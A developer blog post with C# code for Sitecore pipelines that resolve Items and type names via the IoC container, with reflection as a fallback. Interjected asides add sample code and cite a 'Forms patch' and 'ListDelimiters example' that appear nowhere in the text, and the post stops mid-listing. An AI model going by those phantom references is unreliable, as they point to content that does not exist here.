Most bits in Sitecore Experience Forms use objects/service class instances sourced from the Sitecore IoC container, but not all. Things not sourced from the Sitecore IoC container are defined on Items in the following folders:

Why?
¯\_(ツ)_/¯

This is most likely because their fully qualified type names are defined in a type field on Items contained in these folders, and sourcing these from the Sitecore IoC is not a thing OOTB in Sitecore as far as I am aware (reflection is used to create them):

Moreover, this is the same paradigm found in Web Forms for Marketers (WFFM) for some of its parts (Save Actions are an example).

Well, this paradigm bothers me a lot. I strongly feel that virtually everything should be sourced from the Sitecore IoC container, as it promotes SOLID principles (a discussion I will leave for another time), so I went ahead and built a system of Sitecore pipelines and service classes to:

1. Get the fully qualified type name string out of a field of an Item.
2. Resolve the Type from the string from #1.
3. Try to find the Type in the Sitecore IoC container using Service Locator (before whinging about using Service Locator for this, keep in mind that it would be impossible to inject everything from the IoC container into a class instance's constructor in order to find it). If found, return it to the caller. Otherwise, proceed to #4.
4. Create an instance of the Type using reflection. Return the result to the caller.

Most of the code in the solution that follows consists of classes which serve as custom pipeline processors for 5 custom pipelines. Pipelines in Sitecore, each being an embodiment of the chain-of-responsibility pattern, are extremely flexible and extendable, hence the reason for going with this approach.

I plan on putting this solution up on GitHub in the coming days (or weeks, depending on timing) so it is more easily digestible than in a blog post. For now, just have a scan of the code below.

Note: this solution is just a proof of concept (PoC). I have not rigorously tested it; I have no idea what its performance is, nor what performance impact it may have; and I definitely will not be held responsible if something goes wrong should you decide to use this code in any of your solutions. Use at your own risk!

</TL;DR>

Now that we have that out of the way, let's jump right into it.

I first created the following abstract class to serve as the base for all pipeline processors in this solution:

using Sitecore.Pipelines;

namespace Sandbox.Foundation.ObjectResolution.Pipelines
{
    public abstract class ResolveProcessor<TPipelineArgs> where TPipelineArgs : PipelineArgs
    {
        public void Process(TPipelineArgs args)
        {
            if (!CanProcess(args))
            {
                return;
            }

            Execute(args);
        }

        protected virtual bool CanProcess(TPipelineArgs args) => args != null;

        protected virtual void AbortPipeline(TPipelineArgs args) => args?.AbortPipeline();

        protected virtual void Execute(TPipelineArgs args)
        {
        }
    }
}

The Execute() method on a pipeline processor will only run when the processor's CanProcess() method returns true. Pipeline processors also have the ability to abort the pipeline from which they are called.
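To make the base class concrete, here is a contrived processor of my own (not from the post), using the ResolveTypeArgs class that appears later in this article:

using Sitecore.Diagnostics;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.LogTypeNameProcessor
{
    // Contrived example: logs the type name, and only runs when one is present.
    public class LogTypeName : ResolveProcessor<ResolveTypeArgs>
    {
        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && !string.IsNullOrWhiteSpace(args.TypeName);

        protected override void Execute(ResolveTypeArgs args) => Log.Info($"Resolving type: {args.TypeName}", this);
    }
}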
I then created the following abstract class for all service classes which call a pipeline to "resolve" a particular thing:

using Sitecore.Abstractions;
using Sitecore.Pipelines;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers
{
    public abstract class PipelineObjectResolver<TArguments, TPipelineArguments, TResult> where TPipelineArguments : PipelineArgs
    {
        private readonly BaseCorePipelineManager _corePipelineManager;

        protected PipelineObjectResolver(BaseCorePipelineManager corePipelineManager)
        {
            _corePipelineManager = corePipelineManager;
        }

        public TResult Resolve(TArguments arguments)
        {
            TPipelineArguments args = CreatePipelineArgs(arguments);
            RunPipeline(GetPipelineName(), args);
            return GetObject(args);
        }

        protected abstract TResult GetObject(TPipelineArguments args);

        protected abstract TPipelineArguments CreatePipelineArgs(TArguments arguments);

        protected abstract string GetPipelineName();

        protected virtual void RunPipeline(string pipelineName, PipelineArgs args) => _corePipelineManager.Run(pipelineName, args);
    }
}

Each service class will "resolve" a particular thing with arguments passed to its Resolve() method; the TArguments type serves as the input arguments. The service delegates to a pipeline via the RunPipeline() method to do the resolving, and then parses the result returned by the pipeline via the GetObject() method.

Moving forward in this post, I will group each resolving pipeline with its service classes under a <pipeline name /> section.

<resolveItem />

I then moved on to creating a custom pipeline to "resolve" a Sitecore Item. The following class serves as its arguments data transfer object (DTO):

using System.Collections.Generic;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sitecore.Pipelines;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem
{
    public class ResolveItemArgs : PipelineArgs
    {
        public Database Database { get; set; }
        public string ItemPath { get; set; }
        public Language Language { get; set; }
        public IList<IItemResolver> ItemResolvers { get; set; } = new List<IItemResolver>();
        public Item Item { get; set; }
    }
}

The resolution of an Item will be done by a collection of IItemResolver instances (defined further down in this post), which ultimately do the resolution of the Item.
Next, I created the following arguments class for IItemResolver instances:

using Sitecore.Data;
using Sitecore.Globalization;

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers
{
    public class ItemResolverArguments
    {
        public Database Database { get; set; }
        public Language Language { get; set; }
        public string ItemPath { get; set; }
    }
}

Since I hate calling the "new" keyword directly on classes, I created the following factory interface, which will construct the argument objects for both the pipeline and the service classes for resolving an Item:

using Sitecore.Data;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers
{
    public interface IItemResolverArgumentsFactory
    {
        ItemResolverArguments CreateItemResolverArguments(ResolveTypeArgs args);

        ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args);

        ItemResolverArguments CreateItemResolverArguments(Database database = null, Language language = null, string itemPath = null);

        ResolveItemArgs CreateResolveItemArgs(ItemResolverArguments arguments);

        ResolveItemArgs CreateResolveItemArgs(Database database = null, Language language = null, string itemPath = null);
    }
}

Here is the class that implements the interface above:

using Sitecore.Data;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers
{
    public class ItemResolverArgumentsFactory : IItemResolverArgumentsFactory
    {
        public ItemResolverArguments CreateItemResolverArguments(ResolveTypeArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateItemResolverArguments(args.Database, args.Language, args.ItemPath);
        }

        public ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateItemResolverArguments(args.Database, args.Language, args.ItemPath);
        }

        public ItemResolverArguments CreateItemResolverArguments(Database database = null, Language language = null, string itemPath = null)
        {
            return new ItemResolverArguments
            {
                Database = database,
                Language = language,
                ItemPath = itemPath
            };
        }

        public ResolveItemArgs CreateResolveItemArgs(ItemResolverArguments arguments)
        {
            if (arguments == null)
            {
                return null;
            }

            return CreateResolveItemArgs(arguments.Database, arguments.Language, arguments.ItemPath);
        }

        public ResolveItemArgs CreateResolveItemArgs(Database database = null, Language language = null, string itemPath = null)
        {
            return new ResolveItemArgs
            {
                Database = database,
                Language = language,
                ItemPath = itemPath
            };
        }
    }
}

It just creates argument objects for the pipeline and the service classes.
The following interface is for classes that "resolve" Items based on arguments set on an ItemResolverArguments instance:

using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers
{
    public interface IItemResolver
    {
        Item Resolve(ItemResolverArguments arguments);
    }
}

I created another interface for an IItemResolver which resolves an Item from a Sitecore Database:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers
{
    public interface IDatabaseItemResolver : IItemResolver
    {
    }
}

The purpose of this interface is so I can register it, along with the following class which implements it, in the Sitecore IoC container:

using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers
{
    public class DatabaseItemResolver : IDatabaseItemResolver
    {
        public Item Resolve(ItemResolverArguments arguments)
        {
            if (!CanResolveItem(arguments))
            {
                return null;
            }

            if (arguments.Language == null)
            {
                return arguments.Database.GetItem(arguments.ItemPath);
            }

            return arguments.Database.GetItem(arguments.ItemPath, arguments.Language);
        }

        protected virtual bool CanResolveItem(ItemResolverArguments arguments) => arguments != null && arguments.Database != null && !string.IsNullOrWhiteSpace(arguments.ItemPath);
    }
}

An instance of the class above will return a Sitecore Item if a Database and an Item path (this can also be an Item ID) are supplied via the ItemResolverArguments instance passed to its Resolve() method.

Now, let's start constructing the processors for the pipeline.

First, I created an interface and class for adding a "default" IItemResolver to the collection of IItemResolvers defined on the pipeline's arguments object:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor
{
    public interface IAddDefaultItemResolver
    {
        void Process(ResolveItemArgs args);
    }
}

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor
{
    public class AddDefaultItemResolver : ResolveProcessor<ResolveItemArgs>, IAddDefaultItemResolver
    {
        private readonly IDatabaseItemResolver _databaseItemResolver;

        public AddDefaultItemResolver(IDatabaseItemResolver databaseItemResolver)
        {
            _databaseItemResolver = databaseItemResolver;
        }

        protected override bool CanProcess(ResolveItemArgs args) => base.CanProcess(args) && args.ItemResolvers != null;

        protected override void Execute(ResolveItemArgs args) => args.ItemResolvers.Add(GetTypeResolver());

        protected virtual IItemResolver GetTypeResolver() => _databaseItemResolver;
    }
}

In the above class, I'm injecting the IDatabaseItemResolver instance (shown further up in this post) into the constructor, and then adding it to the collection of resolvers.
I then created the following interface and implementation class for doing the "resolving" of the Item:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor
{
    public interface IResolveItem
    {
        void Process(ResolveItemArgs args);
    }
}

using System.Linq;
using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor
{
    public class ResolveItem : ResolveProcessor<ResolveItemArgs>, IResolveItem
    {
        private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory;

        public ResolveItem(IItemResolverArgumentsFactory itemResolverArgumentsFactory)
        {
            _itemResolverArgumentsFactory = itemResolverArgumentsFactory;
        }

        protected override bool CanProcess(ResolveItemArgs args) => base.CanProcess(args) && args.Database != null && !string.IsNullOrWhiteSpace(args.ItemPath) && args.ItemResolvers.Any();

        protected override void Execute(ResolveItemArgs args) => args.Item = GetItem(args);

        protected virtual Item GetItem(ResolveItemArgs args)
        {
            ItemResolverArguments arguments = CreateItemResolverArguments(args);
            if (arguments == null)
            {
                return null;
            }

            foreach (IItemResolver resolver in args.ItemResolvers)
            {
                Item item = resolver.Resolve(arguments);
                if (item != null)
                {
                    return item;
                }
            }

            return null;
        }

        protected virtual ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args) => _itemResolverArgumentsFactory.CreateItemResolverArguments(args);
    }
}

The class above just iterates over all IItemResolver instances on the PipelineArgs instance; passes an ItemResolverArguments instance (created by the factory) to the Resolve() method on each; and returns the first Item found by one of the IItemResolver instances. If none was found, null is returned.

Now we need a service class that calls the custom pipeline. I created the following class to act as a settings class for that service:

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers
{
    public class ItemResolverServiceSettings
    {
        public string ResolveItemPipelineName { get; set; }
    }
}

An instance of this class will be injected into the service (the instance is created by the Sitecore Configuration Factory), and its ResolveItemPipelineName property will contain a value from Sitecore configuration (see the Sitecore patch configuration file towards the bottom of this blog post).
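The patch file itself sits at the end of the original post, beyond this excerpt, but based on the Forms patch shown earlier, the hydration fragment would plausibly look something like this (the element name and pipeline name here are my guesses):

<itemResolverServiceSettings type="Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers.ItemResolverServiceSettings, Sandbox.Foundation.ObjectResolution" singleInstance="true">
  <ResolveItemPipelineName>resolveItem</ResolveItemPipelineName>
</itemResolverServiceSettings>

The Configuration Factory maps the child element name onto the property name, just as with the ListDelimiters example earlier.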
I then created the following interface for the service (it's just another IItemResolver) so I can register it in the Sitecore IoC container:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers
{
    public interface IItemResolverService : IItemResolver
    {
    }
}

The following class implements the interface above:

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sitecore.Abstractions;
using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers
{
    public class ItemResolverService : PipelineObjectResolver<ItemResolverArguments, ResolveItemArgs, Item>, IItemResolverService
    {
        private readonly ItemResolverServiceSettings _settings;
        private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory;

        public ItemResolverService(ItemResolverServiceSettings settings, IItemResolverArgumentsFactory itemResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager)
            : base(corePipelineManager)
        {
            _settings = settings;
            _itemResolverArgumentsFactory = itemResolverArgumentsFactory;
        }

        protected override Item GetObject(ResolveItemArgs args)
        {
            return args.Item;
        }

        protected override ResolveItemArgs CreatePipelineArgs(ItemResolverArguments arguments) => _itemResolverArgumentsFactory.CreateResolveItemArgs(arguments);

        protected override string GetPipelineName() => _settings.ResolveItemPipelineName;
    }
}

The above class subclasses the abstract PipelineObjectResolver class shown further up in this post. Most of the magic happens in that base class (for design pattern buffs, this is an example of the Template Method pattern), and all subsequent pipeline-wrapping service classes will follow this same pattern. I'm not going to go into much detail on the above class, as what's happening should be self-evident after looking at PipelineObjectResolver further up in this post.
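Before moving on, here is a hypothetical consumer (mine, not the post's) to show what calling the pipeline-backed service looks like once IItemResolverService and the factory are registered in the IoC container:

using Sitecore.Data;
using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;

public class SampleConsumer
{
    private readonly IItemResolverService _itemResolverService;
    private readonly IItemResolverArgumentsFactory _argumentsFactory;

    // Both dependencies are constructor-injected from the Sitecore IoC container.
    public SampleConsumer(IItemResolverService itemResolverService, IItemResolverArgumentsFactory argumentsFactory)
    {
        _itemResolverService = itemResolverService;
        _argumentsFactory = argumentsFactory;
    }

    // Resolves an Item through the <resolveItem /> pipeline; the path here is made up.
    public Item GetSettingsItem(Database database) =>
        _itemResolverService.Resolve(_argumentsFactory.CreateItemResolverArguments(database, itemPath: "/sitecore/content/settings"));
}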
<resolveType />

I then started the code for the next pipeline: a pipeline to resolve Types. I created the following PipelineArgs subclass whose instances will serve as arguments to this new pipeline:

using System;
using System.Collections.Generic;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sitecore.Pipelines;
using Sandbox.Foundation.ObjectResolution.Services.Cachers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType
{
    public class ResolveTypeArgs : PipelineArgs
    {
        public Database Database { get; set; }
        public string ItemPath { get; set; }
        public Language Language { get; set; }
        public IItemResolver ItemResolver { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public IList<ITypeResolver> TypeResolvers { get; set; } = new List<ITypeResolver>();
        public ITypeCacher TypeCacher { get; set; }
        public Type Type { get; set; }
        public bool UseTypeCache { get; set; }
    }
}

I then created the following class to serve as an arguments object for services that will resolve Types:

using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers
{
    public class TypeResolverArguments
    {
        public Database Database { get; set; }
        public Language Language { get; set; }
        public string ItemPath { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public bool UseTypeCache { get; set; }
    }
}

As I had done for the previous resolver, I created a factory to create argument objects, both for the PipelineArgs and for the arguments used by the service classes.
Here is the interface for that factory class:

using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers
{
    public interface ITypeResolverArgumentsFactory
    {
        TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args);

        TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args);

        TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args);

        TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args);

        TypeResolverArguments CreateTypeResolverArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false);

        ResolveTypeArgs CreateResolveTypeArgs(TypeResolverArguments arguments);

        ResolveTypeArgs CreateResolveTypeArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false);
    }
}

The following class implements the interface above:

using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers
{
    public class TypeResolverArgumentsFactory : ITypeResolverArgumentsFactory
    {
        public TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache);
        }

        public TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache);
        }

        public TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args)
        {
            if (args == null)
            {
                return null;
            }

            return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache);
        }

        public TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args)
        {
            return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache);
        }

        public TypeResolverArguments CreateTypeResolverArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false)
        {
            return new TypeResolverArguments
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                UseTypeCache = useTypeCache
            };
        }
        public ResolveTypeArgs CreateResolveTypeArgs(TypeResolverArguments arguments)
        {
            if (arguments == null)
            {
                return null;
            }

            return CreateResolveTypeArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.UseTypeCache);
        }

        public ResolveTypeArgs CreateResolveTypeArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false)
        {
            return new ResolveTypeArgs
            {
                Database = database,
                Language = language,
                ItemPath = itemPath,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                UseTypeCache = useTypeCache
            };
        }
    }
}

I'm not going to discuss the class above much; it just creates instances of TypeResolverArguments and ResolveTypeArgs based on the various things provided to each method.

I then created the following interface and class for a pipeline processor that resolves an Item and sets it on the passed PipelineArgs instance if one wasn't provided by the caller or set by another processor:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor
{
    public interface ISetItemResolver
    {
        void Process(ResolveTypeArgs args);
    }
}

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor
{
    public class SetItemResolver : ResolveProcessor<ResolveTypeArgs>, ISetItemResolver
    {
        private readonly IItemResolverService _itemResolverService;

        public SetItemResolver(IItemResolverService itemResolverService)
        {
            _itemResolverService = itemResolverService;
        }

        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Database != null && !string.IsNullOrWhiteSpace(args.ItemPath);

        protected override void Execute(ResolveTypeArgs args) => args.ItemResolver = GetItemResolver();

        protected virtual IItemResolver GetItemResolver() => _itemResolverService;
    }
}

In the class above, I'm injecting an instance of IItemResolverService into the constructor, and setting it on the ItemResolver property of the ResolveTypeArgs instance. Does the IItemResolverService interface look familiar? It should, as it's the IItemResolverService defined further up in this post which calls the <resolveItem /> pipeline.

Now we need a processor to resolve the Item.
The following interface and class do this:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor
{
    public interface IResolveItem
    {
        void Process(ResolveTypeArgs args);
    }
}

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor
{
    public class ResolveItem : ResolveProcessor<ResolveTypeArgs>, IResolveItem
    {
        private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory;

        public ResolveItem(IItemResolverArgumentsFactory itemResolverArgumentsFactory)
        {
            _itemResolverArgumentsFactory = itemResolverArgumentsFactory;
        }

        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Database != null && args.ItemResolver != null;

        protected override void Execute(ResolveTypeArgs args) => args.Item = args.ItemResolver.Resolve(CreateTypeResolverArguments(args));

        protected virtual ItemResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args) => _itemResolverArgumentsFactory.CreateItemResolverArguments(args);
    }
}

The class above just delegates to the IItemResolver instance on the ResolveTypeArgs instance to resolve the Item.

Next, we need a processor to get the fully qualified type name from the Item. The following interface and class are for a processor that does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor
{
    public interface ISetTypeName
    {
        void Process(ResolveTypeArgs args);
    }
}

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor
{
    public class SetTypeName : ResolveProcessor<ResolveTypeArgs>, ISetTypeName
    {
        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Item != null && !string.IsNullOrWhiteSpace(args.TypeFieldName);

        protected override void Execute(ResolveTypeArgs args) => args.TypeName = args.Item[args.TypeFieldName];
    }
}

The class above just gets the value from the field where the fully qualified type name is defined; the name of that field should be set by the caller of this pipeline.
I then defined the following interface for classes which will sort out what the Type object is, based on a fully qualified type name passed to them:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers
{
    public interface ITypeResolver
    {
        Type Resolve(TypeResolverArguments arguments);
    }
}

I then created the following interface for a service class that will delegate to Sitecore.Reflection.ReflectionUtil to get a Type from a provided fully qualified type name:

using System;

namespace Sandbox.Foundation.ObjectResolution.Services.Reflection
{
    public interface IReflectionUtilService
    {
        Type GetTypeInfo(string type);

        object CreateObject(Type type);

        object CreateObject(Type type, object[] parameters);
    }
}

Here's the class that implements the interface above:

using System;
using Sitecore.Reflection;

namespace Sandbox.Foundation.ObjectResolution.Services.Reflection
{
    public class ReflectionUtilService : IReflectionUtilService
    {
        public Type GetTypeInfo(string type)
        {
            return ReflectionUtil.GetTypeInfo(type);
        }

        public object CreateObject(Type type)
        {
            return ReflectionUtil.CreateObject(type);
        }

        public object CreateObject(Type type, object[] parameters)
        {
            return ReflectionUtil.CreateObject(type, parameters);
        }
    }
}

The class above also creates objects via the ReflectionUtil static class from a passed Type and constructor arguments; this will be used in the <createObject /> pipeline further down in this post.

I then defined the following interface for a class that will leverage the IReflectionUtilService above:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers
{
    public interface IReflectionTypeResolver : ITypeResolver
    {
    }
}

This is the class that implements the interface above:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Reflection;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers
{
    public class ReflectionTypeResolver : IReflectionTypeResolver
    {
        private readonly IReflectionUtilService _reflectionUtilService;

        public ReflectionTypeResolver(IReflectionUtilService reflectionUtilService)
        {
            _reflectionUtilService = reflectionUtilService;
        }

        public Type Resolve(TypeResolverArguments arguments)
        {
            if (string.IsNullOrWhiteSpace(arguments?.TypeName))
            {
                return null;
            }

            return GetTypeInfo(arguments.TypeName);
        }

        protected virtual Type GetTypeInfo(string typeName) => _reflectionUtilService.GetTypeInfo(typeName);
    }
}

The class above just delegates to the IReflectionUtilService to get the Type for the supplied fully qualified type name.
I then created the following interface and class to represent a pipeline processor that adds the ITypeResolver above to the collection of ITypeResolvers on the ResolveTypeArgs instance passed to it:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor
{
    public interface IAddDefaultTypeResolver
    {
        void Process(ResolveTypeArgs args);
    }
}

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor
{
    public class AddDefaultTypeResolver : ResolveProcessor<ResolveTypeArgs>, IAddDefaultTypeResolver
    {
        private readonly IReflectionTypeResolver _reflectionTypeResolver;

        public AddDefaultTypeResolver(IReflectionTypeResolver reflectionTypeResolver)
        {
            _reflectionTypeResolver = reflectionTypeResolver;
        }

        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.TypeResolvers != null;

        protected override void Execute(ResolveTypeArgs args) => args.TypeResolvers.Add(GetTypeResolver());

        protected virtual ITypeResolver GetTypeResolver() => _reflectionTypeResolver;
    }
}

There isn't much going on in the class above: the Execute() method just adds the IReflectionTypeResolver to the TypeResolvers collection.

When fishing through the Sitecore Experience Forms assemblies, I noticed the OOTB code was "caching" Types it had resolved from type fields. I decided to employ the same approach, and defined the following interface for objects that cache Types:

using System;

namespace Sandbox.Foundation.ObjectResolution.Services.Cachers
{
    public interface ITypeCacher
    {
        void AddTypeToCache(string typeName, Type type);

        Type GetTypeFromCache(string typeName);
    }
}

Here is the class that implements the interface above:

using System;
using System.Collections.Concurrent;

namespace Sandbox.Foundation.ObjectResolution.Services.Cachers
{
    public class TypeCacher : ITypeCacher
    {
        private static readonly ConcurrentDictionary<string, Type> TypeCache = new ConcurrentDictionary<string, Type>();

        public void AddTypeToCache(string typeName, Type type)
        {
            if (string.IsNullOrWhiteSpace(typeName) || type == null)
            {
                return;
            }

            TypeCache.TryAdd(typeName, type);
        }

        public Type GetTypeFromCache(string typeName)
        {
            if (string.IsNullOrWhiteSpace(typeName))
            {
                return null;
            }

            Type type;
            if (!TypeCache.TryGetValue(typeName, out type))
            {
                return null;
            }

            return type;
        }
    }
}

The AddTypeToCache() method does exactly what its name says: it adds the supplied Type to the cache, with the provided type name as the key into the ConcurrentDictionary on this class. The GetTypeFromCache() method tries to get a Type from that ConcurrentDictionary and returns it to the caller if it was found; if it wasn't found, null is returned.
The following interface and class serve as a pipeline processor to set an ITypeCacher instance on the ResolveTypeArgs instance passed to it:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor
{
    public interface ISetTypeCacher
    {
        void Process(ResolveTypeArgs args);
    }
}

using Sandbox.Foundation.ObjectResolution.Services.Cachers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor
{
    public class SetTypeCacher : ResolveProcessor<ResolveTypeArgs>, ISetTypeCacher
    {
        private readonly ITypeCacher _typeCacher;

        public SetTypeCacher(ITypeCacher typeCacher)
        {
            _typeCacher = typeCacher;
        }

        protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.UseTypeCache && args.TypeCacher == null;

        protected override void Execute(ResolveTypeArgs args) => args.TypeCacher = GetTypeCacher();

        protected virtual ITypeCacher GetTypeCacher() => _typeCacher;
    }
}

There isn't much going on in the class above, except the injection of the ITypeCacher instance defined further up, and setting that instance on the ResolveTypeArgs instance if it hasn't already been set.

Now, we need to resolve the Type. The following interface and its implementation class do just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor
{
    public interface IResolveType
    {
        void Process(ResolveTypeArgs args);
    }
}

using System;
